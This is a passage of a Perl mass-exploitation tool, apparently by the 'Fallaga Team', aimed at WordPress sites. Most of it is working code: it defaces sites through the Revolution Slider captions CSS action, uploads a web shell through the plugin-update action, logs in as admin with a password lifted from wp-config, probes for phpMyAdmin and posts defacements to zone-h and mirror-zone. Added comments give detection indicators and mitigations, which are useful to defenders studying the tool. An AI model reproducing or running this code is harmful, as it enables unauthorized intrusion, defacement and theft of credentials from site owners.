  1397. if ($contt =~ /password="(.*)"/){
  1398. print color("white"),"\t[-]Cpanel Pass = $1 \n\n";
  1399. print color 'reset';
  1400. open (TEXT, '>>Result/cpanels.txt');
  1401. print TEXT "\n[-]Cpanel Pass = $1";
  1402. close (TEXT)
  1403. }
  1404.  
  1405.  
  1406. }
  1407. }else{print " .. ";
  1408. print color('bold white');
  1409. print "[";
  1410. print color('reset');
  1411. print color('bold red');
  1412. print "NOT FOUNDED";
  1413. print color('reset');
  1414. print color('bold white');
  1415. print "] \n";
  1416. print color('reset');
  1417. }
  1418.  
  1419.  
  1420. }
  1421.  
  1422.  
  1423.  
  1424.  
  1425. ####################################################################################################
  1426. ####################################################################################################
  1427. ####################################################################################################
  # revdef: content injection through the revslider_ajax_action AJAX action.
  # Uses the package-level $ua and sets the globals $ajx, $def, $gassface, $response, $stat.
  # Flow: POST to wp-admin/admin-ajax.php with client_action=update_captions_css and an HTML
  # fragment as "data"; if the response contains "true", GET the get_captions_css URL and,
  # when its body matches Hacked|Fallaga|Gassrini, log the site to Result/vulntargets.txt
  # and call zoneh()/mirrorzon().
  # Detection: unauthenticated POSTs to admin-ajax.php with action=revslider_ajax_action and
  # client_action=update_captions_css, and HTML markup inside the plugin's stored captions
  # CSS.
  # Response: update the plugin and restore the captions CSS from a known-good copy.
  1428. sub revdef(){
  1429. print colored ("[DEFACE AJAX]",'white on_red');
  1430.  
  # Both URLs are built by plain concatenation, with no separator added after $site.
  1431. $ajx = $site . 'wp-admin/admin-ajax.php';
  1432.  
  1433. $def = $site .'wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css';
  1434.  
  1435. $gassface = POST $ajx, ['action' => 'revslider_ajax_action', 'client_action' => 'update_captions_css', 'data' =>"<body style='color: transparent;background-color: black'><center><h1><b style='color: white'><center><b>Hacked By Fallag Gassrini</b><br>Fallaga Team<p style='color: transparent'>"];
  1436. $response = $ua->request($gassface);
  1437. $stat = $response->content;
  1438. if ($stat =~ /true/){
  1439. print " ............... ";
  1440. print color('bold white');
  1441. print "[";
  1442. print color('reset');
  1443. print color('bold green');
  1444. print "SUCCESS";
  1445. print color('reset');
  1446. print color('bold white');
  1447. print "] \n";
  1448. print color('reset');
  1449.  
  1450.  
  1451. my $checkajx= $ua->get("$def")->content;
  1452. if($checkajx =~/Hacked|Fallaga|Gassrini/) {
  1453.  
  1454. open(save, '>>Result/vulntargets.txt');
  1455. print save "[rev deface] $site\n";
  1456. close(save);
  1457.  
  1458. print "[DEFACE] .................... ";
  1459. print color('bold white');
  1460. print "[";
  1461. print color('reset');
  1462. print color('bold green');
  1463. print "SUCCESS";
  1464. print color('reset');
  1465. print color('bold white');
  1466. print "] \n";
  1467. print color('reset');
  1468.  
  1469. print "[LINK INDEX] .................. ";
  1470. print color('bold white');
  1471. print "[";
  1472. print color('reset');
  1473. print color('bold green');
  1474. print "SAVED";
  1475. print color('reset');
  1476. print color('bold white');
  1477. print "] \n";
  1478. print color('reset');
  1479.  
  1480. zoneh();
  1481. mirrorzon();
  1482. }
  1483. }else{
  1484. print " ................. \n";
  1485. print color('bold white');
  1486. print "[";
  1487. print color('reset');
  1488. print color('bold green');
  1489. print "ERROR";
  1490. print color('reset');
  1491. print color('bold white');
  1492. print "] \n";
  1493. print color('reset');
  1494.  
  1495. }
  1496. }
  1497. ####################################################################################################
  1498. ####################################################################################################
  1499. ############################### PHP MY ADMIN SCANNER ##############################################
  1500. ####################################################################################################
  1501. ####################################################################################################
  # zebbi: phpMyAdmin path check, called from wpbrute(); ends by calling revdef().
  # For each of /phpMyAdmin/ and /phpmyadmin/ it GETs $site.$pma with a fresh default
  # LWP::UserAgent and reports FOUNDED when the body matches
  # "Welcome to phpMyAdmin", "Username" or "Password"; hits are appended to
  # Result/databases.txt. All loop variables are package globals.
  # Detection: paired GETs for /phpMyAdmin/ and /phpmyadmin/ from a client using the default
  # libwww-perl User-Agent, typically right after revslider_show_image requests.
  # Mitigation: do not expose phpMyAdmin on a public path; restrict it by network or an
  # additional authentication layer.
  1502. sub zebbi{
  1503. print colored ("[PMA SCANNER]",'white on_red');
  1504. print " .................. ";
  1505. print color('bold white');
  1506. print "[";
  1507. print color('reset');
  1508. print color('bold blue');
  1509. print "WAIT";
  1510. print color('reset');
  1511. print color('bold white');
  1512. print "] \n";
  1513. print color('reset');
  1514. use HTTP::Request;
  1515. use LWP::UserAgent;
  1516. @pat=('/phpMyAdmin/','/phpmyadmin/');
  1517. foreach $pma(@pat){
  1518. chomp $pma;
  1519.  
  1520. $url = $site.$pma;
  1521. $req = HTTP::Request->new(GET=>$url);
  # No agent string or timeout is set on this client, unlike the other subs.
  1522. $userAgent = LWP::UserAgent->new();
  1523. $response = $userAgent->request($req);
  1524. $ar = $response->content;
  1525. if ($ar =~ m/Welcome to phpMyAdmin|Username|Password/g){
  1526. print "[$pma] .............. ";
  1527. print color('bold white');
  1528. print "[";
  1529. print color('reset');
  1530. print color('bold green');
  1531. print "FOUNDED";
  1532. print color('reset');
  1533. print color('bold white');
  1534. print "] \n";
  1535. print color('reset');
  1536. open (TEXT, '>>Result/databases.txt');
  1537. print TEXT "\n[PhpMyAdmin]$url => PMA Founded !!\n\n";
  1538. close (TEXT);
  1539.  
  1540. }else{
  1541.  
  1542. print "[$pma] .......... ";
  1543. print color('bold white');
  1544. print "[";
  1545. print color('reset');
  1546. print color('bold red');
  1547. print "NOT FOUNDED";
  1548. print color('reset');
  1549. print color('bold white');
  1550. print "] \n";
  1551. print color('reset');
  1552.  
  1553. }}
  1554. print "[PMA SCAN] ..................... ";
  1555. print color('bold white');
  1556. print "[";
  1557. print color('reset');
  1558. print color('bold blue');
  1559. print "DONE";
  1560. print color('reset');
  1561. print color('bold white');
  1562. print "] \n";
  1563. print color('reset');
  1564. revdef();
  1565.  
  1566. }
  1567. ####################################################################################################
  1568. ####################################################################################################
  1569. ####################################### WORDPRESS BRUTE ############################################
  1570. ####################################################################################################
  1571. ####################################################################################################
  # wpbrute: one login attempt against wp-login.php, called from getconfig().
  # Despite the name it does not iterate over a word list: it submits the fixed user name
  # "admin" with $pass, the database password that getconfig() captured from wp-config.php.
  # Uses the package-level $ua; a status line containing 302 is treated as a successful
  # login and the credentials are appended in clear text to Result/brute.txt. Always ends by
  # calling zebbi().
  # Detection: a single POST to wp-login.php for user "admin" shortly after
  # revslider_show_image requests from the same client.
  # Mitigation: never reuse the database password for a WordPress account, avoid the
  # default "admin" user name, and enforce a second factor or login rate limiting.
  1572. sub wpbrute{
  1573. print colored ("[BRUTE WITH CONFIG PASS]",'white on_red');
  1574. $red = $site . '/wp-admin/';
  1575. $wp= $site . 'wp-login.php';
  1576. $admin = "admin";
  1577. print " ....... ";
  1578. print color('bold white');
  1579. print "[";
  1580. print color('reset');
  1581. print color('bold blue');
  1582. print "WAIT";
  1583. print color('reset');
  1584. print color('bold white');
  1585. print "] \n";
  1586. print color('reset');
  1587.  
  # The captured password is echoed to the operator's terminal here.
  1588. print "[INFO] USER : $admin\n[INFO] PASSWORD : $pass\n";
  1589. $brute = POST $wp, [log => $admin, pwd => $pass, wp-submit => 'Log In', redirect_to => $red];
  1590. $response = $ua->request($brute);
  1591. $stat = $response->status_line;
  1592. if ($stat =~ /302/){
  1593. print "[BRUTE] ............... ";
  1594. print color('bold white');
  1595. print "[";
  1596. print color('reset');
  1597. print color('bold green');
  1598. print "LOGIN SUCCESS";
  1599. print color('reset');
  1600. print color('bold white');
  1601. print "] \n";
  1602. open (TEXT, '>>Result/brute.txt');
  1603. print TEXT "\n[BRUTE][BOOM] $site/wp-login.php => User :$admin Password:$pass\n";
  1604. close (TEXT);
  1605. }else{
  1606. print "[BRUTE]..";
  1607. print color('bold white');
  1608. print "[";
  1609. print color('reset');
  1610. print color('bold red');
  1611. print "USER AND PASSWORD DONT MATCH";
  1612. print color('reset');
  1613. print color('bold white');
  1614. print "] \n";
  1615. print color('reset');
  1616.  
  1617. }
  1618. zebbi();
  1619. }
  1620. ####################################################################################################
  1621. ####################################################################################################
  1622. ################################## REVSLIDER SHELL #########################################
  1623. ####################################################################################################
  1624. ####################################################################################################
  # revshell() -- analysis notes; the code below is unchanged from the paste.
  # Purpose: POSTs a local revslider.zip to wp-admin/admin-ajax.php on the global
  # $site using the Slider Revolution "update_plugin" AJAX action, then checks
  # whether PHP files (presumably dropped by that archive) answer on the site.
  # Globals: rewrites $site in place and sets $def on the success path.
  # Calls zoneh() and mirrorzon() on success, getconfig() on both failure paths.
  # Defender indicators visible in this block:
  #   - POST to /wp-admin/admin-ajax.php with action=revslider_ajax_action and
  #     client_action=update_plugin carrying a file upload;
  #   - files under wp-content/plugins/revslider/temp/update_extract/;
  #   - xGSx.php, un.php and Gass.html requested at the site root.
  # Mitigation: keep the plugin patched and deny PHP execution in plugin
  # temp/upload directories; hunt for the file names above on affected hosts.
  1625. sub revshell(){
  1626. print colored ("[REVSLIDER SHELL]",'white on_red');
  # Prefixes http:// unless the string already contains it.
  1627. if($site !~ /http:\/\//) { $site = "http://$site/"; };
  1628. my $zip = "revslider.zip";
  1629. my $action;
  1630. my $update_file;
  1631. $action = "revslider_ajax_action";
  1632. $update_file = "$zip";
  1633. my $targd = "wp-admin/admin-ajax.php";
  1634. my $herwgo = "$site/wp-content/plugins/revslider/temp/update_extract/revslider/herewgo.php";
  1635.  
  # Named sub nested inside revshell; Perl still installs it at package scope.
  # Returns one of six hard-coded browser User-Agent strings chosen at random,
  # so User-Agent alone is not a reliable detection key for this tool.
  1636. sub randomagent {
  1637. my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
  1638. 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
  1639. 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
  1640. 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
  1641. 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
  1642. 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
  1643. );
  1644. my $random = $array[rand @array];
  1645. return($random);
  1646. }
  1647. my $useragent = randomagent();
  1648.  
  # Client is built with TLS hostname verification disabled and a 10 s timeout.
  1649. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  1650. $ua->timeout(10);
  1651. $ua->agent($useragent);
  # Multipart form POST; the update_file field is a file upload of the local $zip.
  1652. my $exploit = $ua->post("$site/$targd", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]);
  # The reply text "Wrong update extracted folder" is what this script treats as
  # the marker of a vulnerable install.
  1653. if ($exploit->decoded_content =~ /Wrong update extracted folder/) {
  1654. print " .............. ";
  1655. print color('bold white');
  1656. print "[";
  1657. print color('reset');
  1658. print color('bold green');
  1659. print "VULN";
  1660. print color('reset');
  1661. print color('bold white');
  1662. print "] \n";
  1663. print color('reset');
  1664. print "[UPLOAD SHELL]";
  # Requests the extracted PHP file (response body is never used), then fetches
  # xGSx.php at the site root and matches its password form.
  1665. my $exploitrevshell = $ua->get("$herwgo")->content;
  1666. my $exploitrevshellz = $ua->get("$site/xGSx.php")->content;
  1667. if($exploitrevshellz =~/<form method=post>Password: <input type=password name=pass><input type=submit value=/) {
  1668. print " ................... ";
  1669. print color('bold white');
  1670. print "[";
  1671. print color('reset');
  1672. print color('bold green');
  1673. print "OK";
  1674. print color('reset');
  1675. print color('bold white');
  1676. print "] \n";
  1677. print color('reset');
  1678. print "[SHELL LINK] => $site/xGSx.php\n";
  # Results are appended to Result/shells.txt; the open() is not checked.
  1679. open(save, '>>Result/shells.txt');
  1680. print save "[REVSLIDER] $site/xGSx.php\n";
  1681. close(save);
  # un.php is expected to echo "path:" and "uname:" values, which are captured
  # by the regex below and logged.
  1682. my $checkun = $ua->get("$site/un.php")->content;
  1683. if($checkun =~ /path:(.*)<b><br>uname:(.*)<br><\/b>fallagateam/){
  1684. print "\n";
  1685. print colored ("Path : $1",'black on_yellow'),"\n\n";
  1686.  
  1687. print colored ("Kernel:$2",'black on_yellow'),"\n";
  1688. open(save, '>>Result/shells.txt');
  1689. print save "Path : $1\nKernel:$2\n";
  1690. close(save);
  # $def is an undeclared (package) variable; zoneh() and mirrorzon() read it.
  1691. $def="$site/Gass.html";
  1692. print "[INDEX LINK] => $def \n";
  1693.  
  1694. zoneh();
  1695. mirrorzon();
  1696. }
  1697. }else{
  1698. print " ................ ";
  1699. print color('bold white');
  1700. print "[";
  1701. print color('reset');
  1702. print color('bold red');
  1703. print "ERROR";
  1704. print color('reset');
  1705. print color('bold white');
  1706. print "] \n";
  1707. print color('reset');
  # Falls through to getconfig(), defined elsewhere in the script.
  1708. getconfig();
  1709. }
  1710. }
  1711. else {
  1712. print " .......... ";
  1713. print color('bold white');
  1714. print "[";
  1715. print color('reset');
  1716. print color('bold red');
  1717. print "NOT VULN";
  1718. print color('reset');
  1719. print color('bold white');
  1720. print "] \n";
  1721. print color('reset');
  1722.  
  1723. getconfig();
  1724. }
  1725. }
  1726.  
  1727. ####################################################################################################
  1728. ####################################################################################################
  1729. ###################################### zone h poster #######################################
  1730. ####################################################################################################
  1731. ####################################################################################################
  # zoneh() -- analysis notes; the code below is unchanged from the paste.
  # Appends the global $def (the defaced-page URL set by the caller) to
  # Result/index.txt, then form-POSTs it as 'domain1' with a submitter name to
  # the URL held in $zn, and classifies the reply by matching red "ERROR" / "OK"
  # markup in the response body. In this copy $hack and $zn are empty strings.
  # Defender note: a public listing of your domain on a defacement archive is an
  # external signal of compromise; outbound notification POSTs like this one
  # from a host you own suggest the tool was run from that host.
  1732. sub zoneh(){
  1733. # // this to post all our deface on zone-h //
  1734. print colored ("[ZONE-H]",'black on_yellow');
  1735. open(save, '>>Result/index.txt');
  1736. print save "$def\n";
  1737. close(save);
  1738.  
  1739. $hack=""; # chaneg Fallaga Team by Your zone h name :p - thats not recode lamerz lol ..//
  1740. $zn="";
  # A fresh LWP::UserAgent with default settings is created for this request.
  1741. $lwp=LWP::UserAgent->new;
  1742. $res=$lwp -> post($zn,[
  1743. 'defacer' => $hack,
  1744. 'domain1' => $def,
  1745. 'hackmode' => '15',
  1746. 'reason' => '1',
  1747. 'submit' => 'Send',
  1748. ]);
  # Outcome is decided purely by string-matching the returned HTML.
  1749. if ($res->content =~ /color="red">ERROR<\/font><\/li>/) {
  1750. print " ...................... ";
  1751. print color('bold white');
  1752. print "[";
  1753. print color('reset');
  1754. print color('bold red');
  1755. print "ERROR";
  1756. print color('reset');
  1757. print color('bold white');
  1758. print "] \n";
  1759. print color('reset');
  1760.  
  1761. }
  1762. elsif ($res->content =~ /color="red">OK<\/font><\/li>/) {
  1763. print " ......................... ";
  1764. print color('bold white');
  1765. print "[";
  1766. print color('reset');
  1767. print color('bold green');
  1768. print "OK";
  1769. print color('reset');
  1770. print color('bold white');
  1771. print "] \n";
  1772. print color('reset');
  1773.  
  1774.  
  1775. }
  1776. else
  1777. {
  1778. print colored ("[ERROR !]Error Can't Submit it On Zone-h Gass",'white on_red'),"\n";
  1779.  
  1780. }
  1781. }
  1782. ####################################################################################################
  1783. ####################################################################################################
  1784. ##################################### Mirror zone poster #######################################
  1785. ####################################################################################################
  1786. ####################################################################################################
  # mirrorzon() -- analysis notes; the code below is unchanged from the paste.
  # Builds a form POST (fields 'hacker' and 'text') carrying the global $def to
  # the hard-coded notify URL in $mz, sends it, and prints OK or ERROR depending
  # on whether the response body matches the success sentence.
  # $ua is not declared in this sub; presumably it is the script-wide client
  # created elsewhere (the `my $ua` inside revshell is lexical to that sub) --
  # confirm against the rest of the file.
  # Defender note: the hard-coded hostname below is a network indicator for
  # egress logs on any machine suspected of running this tool.
  1787. sub mirrorzon(){
  1788. # for mirror zone post xD
  1789. print colored ("[MIRROR-ZONE]",'black on_yellow');
  1790. $mz = "http://mirror-zone.org/notify/singel.php";
  1791. $fgtn="Fallaga Team"; # u can change it by ur name on mirror zone and plz madafaking bitchs dont call this recode lol !
  1792. $mzp = POST $mz, [hacker => $fgtn, text => $def];
  1793. $response = $ua->request($mzp);
  # The trailing dots in this pattern are unescaped, so each matches any character.
  1794. if ($response->content =~ /Deface Add successfully added to Archive .../) {
  1795. print " .................... ";
  1796. print color('bold white');
  1797. print "[";
  1798. print color('reset');
  1799. print color('bold green');
  1800. print "OK";
  1801. print color('reset');
  1802. print color('bold white');
  1803. print "] \n";
  1804. print color('reset');
  1805. }else {
  1806. print " ................. ";
  1807. print color('bold white');
  1808. print "[";
  1809. print color('reset');
  1810. print color('bold red');
  1811. print "ERROR";
  1812. print color('reset');
  1813. print color('bold white');
  1814. print "] \n";
  1815. print color('reset');
  1816. }
  1817. }